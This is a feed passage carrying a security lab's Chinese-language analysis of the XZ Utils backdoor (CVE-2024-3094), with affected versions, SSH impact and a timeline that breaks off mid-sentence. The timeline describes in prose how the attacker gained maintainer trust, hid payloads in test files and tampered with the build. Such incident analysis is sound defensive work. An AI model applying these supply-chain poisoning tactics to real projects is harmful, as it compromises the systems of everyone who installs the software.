14px;letter-spacing: 0.578px;text-decoration: none;"><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Apr" target="_blank">https://msrc.microsoft.com/update-guide/releaseNote/2024-Apr</a></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x04 声明</span></strong><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;text-align: left;line-height: 25.5px;text-indent: 32px;margin-bottom: 0px;"><br/></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。<br/></p><section style="white-space: normal;margin-bottom: 0px;"><section><section powered-by="xiumi.us"><section style="margin: 30px 0% 10px;"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);padding: 10px;background-color: rgba(244, 242, 240, 0.6);"><section><section style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。</span><br/></p></section></section></section></section></section></section></section><section style="margin-bottom: 0px;"><section powered-by="xiumi.us"><section style="text-align: center;margin: 30px 0% 10px;"><section style="display: inline-block;width: 95%;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;padding: 5px;"><section powered-by="xiumi.us"><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><img class="rich_pages wxw-img" data-ratio="0.06041666666666667" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="png" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;vertical-align: middle;width: 38%;box-shadow: rgb(0, 0, 0) 0px 0px 0px;padding-left: 10px;"><section powered-by="xiumi.us"><section style="margin-top: 10px;margin-bottom: 10px;"><section style="vertical-align: middle;display: inline-block;"><img class="rich_pages wxw-img" data-ratio="1" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="jpeg" data-w="344" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 61.8%;"><section powered-by="xiumi.us"><section><section style="font-size: 14px;"><p><span style="font-family:Optima-Regular, PingFangTC-light;">天融信</span></p><p><span style="font-family:Optima-Regular, PingFangTC-light;">阿尔法实验室</span></p></section></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);padding: 5px;background-color: rgb(252, 228, 236);"><section powered-by="xiumi.us"><section><section style="text-align: left;color: rgb(131, 129, 129);padding-right: 8px;padding-left: 8px;font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;">长按二维码关注我们</span></p></section></section></section></section></section></section></section></section></section></section></section></section></section><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247496629">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=3f981bcc&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496629%26idx%3D1%26sn%3D5596cc45149b977bc8a8242218d030c7%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 10 Apr 2024 15:22:00 +0800</pubDate>
    </item>
    <item>
      <title>XZ Utils（CVE-2024-3094）供应链投毒深度分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496627&amp;idx=1&amp;sn=0f65a56d67de2ead7f9ee32ff1441632</link>
      <description>0x01 事件概述近日，微软一名软件工程师Andres Freund公开披露，其观察到liblzma库存在一些</description>
      <content:encoded><![CDATA[<p>
原创 <span>阿尔法实验室</span> <span>2024-04-03 18:53</span> <span style="display: inline-block;">北京</span>
</p>

<p>0x01 事件概述近日，微软一名软件工程师Andres Freund公开披露，其观察到liblzma库存在一些</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=5c175ab3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGEyhS6FvTKGPH9K5q3WxdC6snd0EaIFibFj0ic8H1GOicwvOsibeBvOt9VA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012971" data-ratio="0.4255555555555556" data-s="300,640" style="" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=13c19e3d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGOibkdcOIkW4Zt4megmoM8TwbqHAwt4yjklvLMK0CQwTzsvibiauia9nVCQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: inline-block;counter-increment: counterh2 1;color: rgb(143, 220, 143);border-bottom: 4px solid rgb(143, 220, 143);font-size: 18px;padding: 2px 4px;letter-spacing: 0.5px;">0x01 事件概述<br/></span></h2><p style="margin-top: 16px;margin-bottom: 0px;"><span style="font-size: 14px;">近日，微软一名软件工程师Andres Freund公开披露，其观察到<span style="letter-spacing: 0.5px;font-size: 14px;">liblzma</span>库存在一些奇怪的现象，包括在用ssh远程登录异常及内存错误。经过分析，其确认在<span style="letter-spacing: 0.5px;font-size: 14px;">liblzma</span>上游组件<span style="letter-spacing: 0.5px;font-size: 14px;">xz-utils</span>中存在后门代码，后门或可导致攻击者能够在ssh登录认证前，执行攻击者指定的任意代码，可对Linux服务器安全造成严重影响。</span></p><p style="margin-bottom: 0px;margin-top: 16px;"><span style="font-size: 14px;">综合情况看，这是一起开源软件供应链投毒攻击事件。攻击者伪装成开发者，借更新之名，秘密的向<span style="letter-spacing: 0.5px;font-size: 14px;">xz-utils</span>中加入后门代码，导致<span style="letter-spacing: 0.5px;font-size: 14px;">xz-utils</span>中的<span style="letter-spacing: 0.5px;font-size: 14px;">liblzma</span>易受攻击。</span></p><p style="margin-bottom: 0px;margin-top: 16px;"><span style="font-size: 14px;">OpenSSH用于SSH登录，广泛部署于基于Linux发行的操作系统中。其默认不依赖<span style="letter-spacing: 0.5px;font-size: 14px;">liblzma</span>，但是部分Linux发行版会对OpenSSH进行二次开发而导致其默认加载LibSystemd，而LibSystemd默认加载<span style="font-size: 14px;"><span style="letter-spacing: 0.5px;font-size: 14px;">liblzma</span></span>。就这样，OpenSSH间接的因<span style="letter-spacing: 0.5px;font-size: 14px;">xz-utils</span>的投毒而变得易受攻击，在认证前可执行攻击者发送的恶意代码。 天融信对该漏洞及相关事件的详细分析情况如下。</span></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: inline-block;counter-increment: counterh2 1;color: rgb(143, 220, 143);border-bottom: 4px solid rgb(143, 220, 143);font-size: 18px;padding: 2px 4px;letter-spacing: 0.5px;">0x02 影响</span></h2><p style="margin-bottom: 0px;margin-top: 16px;"><span style="letter-spacing: 0.5px;font-size: 14px;">liblzma/xz官方库遭到供应链攻击，并被恶意篡改以植入后门。xz主要功能是提供数据压缩和解压缩功能，集成了liblzma等组件。部分linux操作系统ssh的底层实现中间接引用了<span style="letter-spacing: 0.5px;font-size: 14px;">liblzma</span>，常见的如Red Hat、Debian、Kali Linux、Arch Linux、SUSE、Alpine Linux。<br/></span></p><p style="margin-bottom: 0px;margin-top: 16px;"><span style="letter-spacing: 0.5px;font-size: 14px;">xz-utils 分为 liblzma 和 xz 两部分。xz 是一个单文件压缩软件，采用了压缩率高的 LZMA 算法，在 Linux 中被广泛使用。liblzma 是 LZMA 算法的实现，被应用于 systemd 等多个 Linux 系统和应用软件。</span></p><section style="margin-top: 16px;margin-bottom: 24px;"><span style="letter-spacing: 0.5px;font-size: 14px;">OpenSSH 是一个用于安全远程访问的开源软件套件，它提供了加密的通信会话，以及在网络上安全地传输文件的工具。OpenSSH 实现 SSH 协议进行远程登录的连接工具。恶意代码可能允许攻击者通过后门版本的SSH非授权获取系统的访问权限。</span></section><section style="box-sizing: border-box;font-size: 16px;"><section style="margin: 10px 0%;box-sizing: border-box;"><section style="display: inline-block;width: auto;vertical-align: top;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-left: 10px;min-width: 10%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: left;margin-right: 0%;margin-left: 0%;justify-content: flex-start;box-sizing: border-box;"><section style="display: inline-block;min-width: 10%;max-width: 100%;vertical-align: top;transform: matrix(1, 0, -0.2, 1, 0, 0);-webkit-transform: matrix(1, 0, -0.2, 1, 0, 0);-moz-transform: matrix(1, 0, -0.2, 1, 0, 0);-o-transform: matrix(1, 0, -0.2, 1, 0, 0);border-style: none none none solid;border-width: 1px 5px 1px 0px;border-color: rgba(255, 255, 255, 0) rgba(255, 255, 255, 0) rgb(92, 107, 192) rgb(223, 46, 0);padding: 5px 10px;background-color: rgb(0, 0, 0);box-shadow: rgba(255, 255, 255, 0) 0px 0px 0px;line-height: 1;letter-spacing: 0px;width: auto;height: auto;box-sizing: border-box;"><section style="color: rgb(255, 255, 255);box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="letter-spacing: 0.5px;">01</span></p></section></section></section></section><section style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;height: auto;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-right: 20px;padding-left: 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="color: rgb(0, 0, 0);box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="letter-spacing: 0.5px;"><strong style="box-sizing: border-box;">影响版本<br/></strong></span></p></section></section></section></section><p><span style="font-size: 14px;">xz == 5.6.0 <br/>xz == 5.6.1<br/>liblzma== 5.6.0 <br/>liblzma== 5.6.1</span><span style="letter-spacing: 0.5px;font-size: 14px;"><br/></span></p><section style="box-sizing: border-box;font-size: 16px;"><section style="margin: 10px 0%;box-sizing: border-box;"><section style="display: inline-block;width: auto;vertical-align: top;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-left: 10px;min-width: 10%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: left;margin-right: 0%;margin-left: 0%;justify-content: flex-start;box-sizing: border-box;"><section style="display: inline-block;min-width: 10%;max-width: 100%;vertical-align: top;transform: matrix(1, 0, -0.2, 1, 0, 0);-webkit-transform: matrix(1, 0, -0.2, 1, 0, 0);-moz-transform: matrix(1, 0, -0.2, 1, 0, 0);-o-transform: matrix(1, 0, -0.2, 1, 0, 0);border-style: none none none solid;border-width: 1px 5px 1px 0px;border-color: rgba(255, 255, 255, 0) rgba(255, 255, 255, 0) rgb(92, 107, 192) rgb(223, 46, 0);padding: 5px 10px;background-color: rgb(0, 0, 0);box-shadow: rgba(255, 255, 255, 0) 0px 0px 0px;line-height: 1;letter-spacing: 0px;width: auto;height: auto;box-sizing: border-box;"><section style="color: rgb(255, 255, 255);box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="letter-spacing: 0.5px;">02</span></p></section></section></section></section><section style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;height: auto;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-right: 20px;padding-left: 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="color: rgb(0, 0, 0);box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="letter-spacing: 0.5px;"><strong style="box-sizing: border-box;">影响情况<br/></strong></span></p></section></section></section></section><p><span style="font-size: 14px;">当前的情况显示，该漏洞在”投毒”初期便被发现并披露，影响部分系统及服务，尚未大面积扩散。运维及管理人员仍需重视该事件，尽快检查及处置。</span><br/></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: inline-block;counter-increment: counterh2 1;color: rgb(143, 220, 143);border-bottom: 4px solid rgb(143, 220, 143);font-size: 18px;padding: 2px 4px;letter-spacing: 0.5px;">0x03 投毒方式</span></h2><section style="box-sizing: border-box;font-size: 16px;"><section style="margin: 10px 0%;box-sizing: border-box;"><section style="display: inline-block;width: auto;vertical-align: top;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-left: 10px;min-width: 10%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: left;margin-right: 0%;margin-left: 0%;justify-content: flex-start;box-sizing: border-box;"><section style="display: inline-block;min-width: 10%;max-width: 100%;vertical-align: top;transform: matrix(1, 0, -0.2, 1, 0, 0);-webkit-transform: matrix(1, 0, -0.2, 1, 0, 0);-moz-transform: matrix(1, 0, -0.2, 1, 0, 0);-o-transform: matrix(1, 0, -0.2, 1, 0, 0);border-style: none none none solid;border-width: 1px 5px 1px 0px;border-color: rgba(255, 255, 255, 0) rgba(255, 255, 255, 0) rgb(92, 107, 192) rgb(223, 46, 0);padding: 5px 10px;background-color: rgb(0, 0, 0);box-shadow: rgba(255, 255, 255, 0) 0px 0px 0px;line-height: 1;letter-spacing: 0px;width: auto;height: auto;box-sizing: border-box;"><section style="color: rgb(255, 255, 255);box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="letter-spacing: 0.5px;">01</span></p></section></section></section></section><section style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;height: auto;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-right: 20px;padding-left: 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="color: rgb(0, 0, 0);box-sizing: border-box;"><p style="box-sizing: border-box;">时间线梳理<span style="font-size: 14px;"><br/></span></p></section></section></section></section><section style="margin-top: 16px;margin-bottom: 24px;"><span style="font-size: 14px;"><span style="letter-spacing: 0.5px;font-size: 14px;">xz-utils</span> 有两名维护者：Lasse Collin （昵称Larhzu）和 JiaT75（昵称Jia Tan），其中 Lasse Collin 自从 2009 年以来一直维护着 XZ-Utils 库，JiaT75则是本次事件的聚焦点之一，其在</span><span style="color: rgb(255, 0, 0);font-size: 14px;text-decoration: underline;"><strong>2021年注册后的11月16日</strong></span><span style="font-size: 14px;">向libarchive（与xz无关）进行了第一次pr，添加了一个未打印的详情错误，这个过程中，将原本的safe_fprintf更改为了unsafe fprintf。</span></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012950" data-ratio="0.5852390852390852" data-s="300,640" style="" data-type="png" data-w="962" src="https://wechat2rss.xlab.app/img-proxy/?k=5e0a2e09&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGfdhdTV5k9ZnAJ1cZT0VPpbQlVTicAOqHrlI2cciaGzLtCfptOa78eYCQ%2F640%3Fwx_fmt%3Dother%26from%3Dappmsg"/></p><p><span style="font-size: 14px;">从Mail Archive（xz项目的邮件沟通记录）来看，其最早于</span><span style="font-size: 14px;text-decoration: underline;"><strong><span style="text-decoration: underline;font-size: 14px;color: rgb(255, 0, 0);">2021年10月29日</span></strong></span><span style="font-size: 14px;">尝试向xz提交代码。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012951" data-ratio="0.52" data-s="300,640" style="" data-type="png" data-w="750" src="https://wechat2rss.xlab.app/img-proxy/?k=c9a8f234&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGXiaF5daQJPqbbFFOTDXmKtveycDh0zfEfvqRYqwY2V7JFVIptEyADicg%2F640%3Fwx_fmt%3Dother%26from%3Dappmsg"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012952" data-ratio="1.3568281938325992" data-s="300,640" style="" data-type="png" data-w="681" src="https://wechat2rss.xlab.app/img-proxy/?k=ebe37d5e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGTDvsSrBOMF5CELncaWUYuOLx5WJmESuDyzLjicYfBMxWKLMAfW8aibjw%2F640%3Fwx_fmt%3Dother%26from%3Dappmsg"/></p><section style="margin-top: 16px;margin-bottom: 24px;"><span style="font-size: 14px;">从</span><span style="font-size: 14px;text-decoration: underline;color: rgb(255, 0, 0);"><strong>2022年5月19日</strong></span><span style="font-size: 14px;">开始，ID“Jigar Kumar”和“Dennis Ens”持续对Lasse Collin进行施压，希望选取新的项目开发者来加快更新速度。<br/></span></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012977" data-ratio="0.8423423423423423" data-s="300,640" style="" data-type="png" data-w="888" src="https://wechat2rss.xlab.app/img-proxy/?k=52455ef4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGe8GIo27LPpIgmk4sXL5rNn8vxW9hjAiawT5pO9MQ5lg0Z0hVwfeokKQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012978" data-ratio="0.8397590361445784" data-s="300,640" style="" data-type="png" data-w="830" src="https://wechat2rss.xlab.app/img-proxy/?k=cf2896e6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGDxOorWLAu9MmcGu8iaw65jRO0rl8ZjDa1pzzn8sz6Ox6CXiarRWTRSUQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><span style="font-size: 14px;"></span></p><section style="margin-top: 16px;margin-bottom: 24px;"><span style="font-size: 14px;">在之后的时间里，Jia Tan逐渐获得了项目所有者Lasse Collin的信任，拥有自行提交代码的权力，GitHub上的项目最早提交记录可以追溯到</span><span style="color: rgb(255, 0, 0);font-size: 14px;text-decoration: underline;"><strong>2022年2月7日</strong></span><span style="font-size: 14px;">，此时的提交应该还是原作者参与审核的阶段。</span></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012953" data-ratio="0.7431102362204725" data-s="300,640" style="" data-type="png" data-w="1016" src="https://wechat2rss.xlab.app/img-proxy/?k=039e1704&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGXKGiafQUehicic6DwRjFHCg6xAA7Ziax2K9KkBibM8rHFXGQmia9cEwsZ1hQ%2F640%3Fwx_fmt%3Dother%26from%3Dappmsg"/></p><p><span style="font-size: 14px;">从</span><span style="color: rgb(255, 0, 0);font-size: 14px;text-decoration: underline;"><strong>2022年的12月30日</strong></span><span style="font-size: 14px;">开始，JiaT75有了独自提交代码的能力。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012954" data-ratio="0.5573366214549939" data-s="300,640" style="" data-type="png" data-w="811" src="https://wechat2rss.xlab.app/img-proxy/?k=5264d17e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGNYH1t3KZQPohOutL8cdK3hKQb9LuZj7rfZ1hheAWThjUVT09icX3FmQ%2F640%3Fwx_fmt%3Dother%26from%3Dappmsg"/></p><section style="margin-top: 16px;margin-bottom: 24px;"><span style="color: rgb(255, 0, 0);font-size: 14px;text-decoration: underline;"><strong>2023年6月23日</strong></span><span style="font-size: 14px;">，GitHub用户“hansjans162”向xz提交了ifunc 解析器替换掉 crc32 模块功能，猜测此ID可能为攻击者另一帐号，并且此ID和在其后的催促debian更新的邮件发送者相同。<br/></span></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012955" data-ratio="0.5916666666666667" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c32d45e5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGl7CZ7M6PsH1YTaep2fGZJIY8giaYQziaUXeIonX0LoqtvHaUfkEL8O5w%2F640%3Fwx_fmt%3Dother%26from%3Dappmsg"/><span style="font-size: 14px;"> <br/></span></p><section style="margin-top: 16px;margin-bottom: 24px;"><span style="font-size: 14px;">在</span><span style="color: rgb(255, 0, 0);font-size: 14px;text-decoration: underline;"><strong>2024年的2月15日</strong></span><span style="font-size: 14px;">的提交中，JiaT75将包含恶意编译代码的文件“build-to-host.m4”添加到.gitignore 文件中，此时该文件将不会被上传到git</span><span style="font-size: 14px;">。</span></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012956" data-ratio="0.43813847900113506" data-s="300,640" style="" data-type="png" data-w="881" src="https://wechat2rss.xlab.app/img-proxy/?k=1c07228c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGxUTPQ89BwOGc58IV7ibLR4Rvnh9P8nmvCHibWfkQBGUScaibicv3h12O4Q%2F640%3Fwx_fmt%3Dother%26from%3Dappmsg"/></p><p><span style="font-size: 14px;">直到</span><span style="color: rgb(255, 0, 0);font-size: 14px;text-decoration: underline;"><strong>2024年2月23日</strong></span><span style="font-size: 14px;">时，JiaT75开始向xz投递了带有恶意载荷文件bad-3-corrupt_lzma2.xz和good-large_compressed.lzma，其自称，文件中包含了一些测试用的“随机数据”，和一些无法被解压的“损坏数据”。为了更好地隐蔽恶意载荷，其中大多数测试数据都是正常无害的。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012957" data-ratio="1.1153846153846154" data-s="300,640" style="" data-type="png" data-w="676" src="https://wechat2rss.xlab.app/img-proxy/?k=5d0b904f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGAtTyDZJV3ynQybgKBoqyISMOfQAseicPYbRWiaVF3p9RicQosM9RZPsnA%2F640%3Fwx_fmt%3Dother%26from%3Dappmsg"/></p><section style="margin-top: 16px;text-align: left;"><span style="color: rgb(255, 0, 0);font-size: 14px;text-decoration: underline;"><strong>2024年2月24日</strong></span><span style="font-size: 14px;">时，JiaT75发布了5.6.0版本，在这个版本中，其添加了恶意构建文件“build-tohost.m4”，但是该文件并不存在于GitHub源代码仓库中，而是存在于其releases版本中（<a href="https://web.archive.org/web/20240226100419/https://github.com/tukaani-project/xz/releases/download/v5.6.0/xz-5.6.0.tar.gz），其后该版本tarball（打包文件）随即被Debian添加到不稳定版。在编译脚本“build-tohost.m4”中，特定条件下会从bad-3-corrupt_lzma2.xz和good-large_compressed.lzma这两个文件中读取内容对.o文件进行修改，致使编译结果和公开的源代码不一致完成供应链攻击。" target="_blank">https://web.archive.org/web/20240226100419/https://github.com/tukaani-project/xz/releases/download/v5.6.0/xz-5.6.0.tar.gz），其后该版本tarball（打包文件）随即被Debian添加到不稳定版。在编译脚本“build-tohost.m4”中，特定条件下会从bad-3-corrupt_lzma2.xz和good-large_compressed.lzma这两个文件中读取内容对.o文件进行修改，致使编译结果和公开的源代码不一致完成供应链攻击。</a></span></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012975" data-ratio="0.4583333333333333" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=843195ea&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGfpaiaQ8xZQcA2DrkyjRgFiau5zwqAtrFVEYcu4szcs8ibzjNYpZSRxqFQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><section style="margin-top: 16px;"><span style="color: rgb(255, 0, 0);font-size: 14px;text-decoration: underline;"><strong>2024年2月26日</strong></span><span style="font-size: 14px;">时，JiaT75修改了CMakeLists.txt文件，在其中添加了一个毫不起眼的“.”来绕过了Linux Landlock 检查。因为其编译过程会出错导致得到的结果和预想的不一致。</span></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012960" data-ratio="1.0829383886255923" data-s="300,640" style="" data-type="png" data-w="844" src="https://wechat2rss.xlab.app/img-proxy/?k=73666d7c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGfLCicert4SG7sZLpewuibFUibojMdUZ15K1P60ymXUwFNNXaO5wdY85Og%2F640%3Fwx_fmt%3Dother%26from%3Dappmsg"/></p><section style="margin-top: 16px;"><span style="color: rgb(255, 0, 0);font-size: 14px;text-decoration: underline;"><strong>2024年3月9日</strong></span><span style="font-size: 14px;">时，JiaT75发布了5.6.1版本，改进了原来的恶意载荷文件，这次则增加了检查脚本判断是否在Linux上运行。</span></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012961" data-ratio="0.8811188811188811" data-s="300,640" style="" data-type="png" data-w="572" src="https://wechat2rss.xlab.app/img-proxy/?k=a80bbb6c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGtK1uvFgLgRTOkbcdVz2YR3IiazYfK8QA8pNw9VIQ2mAzeZKLXdu3hoA%2F640%3Fwx_fmt%3Dother%26from%3Dappmsg"/></p><p style="margin-top: 16px;margin-bottom: 24px;"><span style="font-size: 14px;">在</span><span style="color: rgb(255, 0, 0);font-size: 14px;text-decoration: underline;"><strong>2024年3月20日</strong></span><span style="font-size: 14px;">，jia 